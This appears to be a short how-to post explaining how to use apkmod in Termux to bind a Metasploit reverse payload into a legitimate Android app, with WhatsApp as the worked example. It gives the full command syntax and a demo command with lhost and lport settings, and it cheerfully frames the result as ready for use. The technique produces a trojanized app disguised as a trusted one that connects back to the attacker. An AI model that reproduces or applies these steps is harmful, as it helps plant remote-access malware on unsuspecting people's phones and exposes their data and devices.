So let's bind Metasploit Payload in any android application in termux. You can also bind Metasploit Payload with GBWhatsapp using apkmod.
REQUIREMENTS
- Termux
- Apkmod Installed in Termux
- That's it :)
INSTALL APKMOD IN TERMUX
Goto this page CLICK HERE
Ok so now let's bind an app with metasploit payload
STEPS
- First make sure that you have Installed metasploit already and have your original app in which you want to bind :)
- Execute apkmod with -b option to give your original legit app and -o option to give new name for binded app and lhost & lport to make payload with lhost and lport at same time.
- General Syntax of using apkmod is
apkmod -b -i original.apk -o binded.apk lhost=yourLhostHere lport=yourLportHere
EXAMPLE
Ok so i will give you a demo by binding payload in whatsapp
apkmod -b -i /sdcard/Whatsapp.apk -o mybindedapp.apk lhost=127.0.0.1 lport=4444
After above command , apkmod will make the payload with given lhost & lport then bind with gbwhatsapp.
Happy Payloading .. :)
You can always contact me at telegram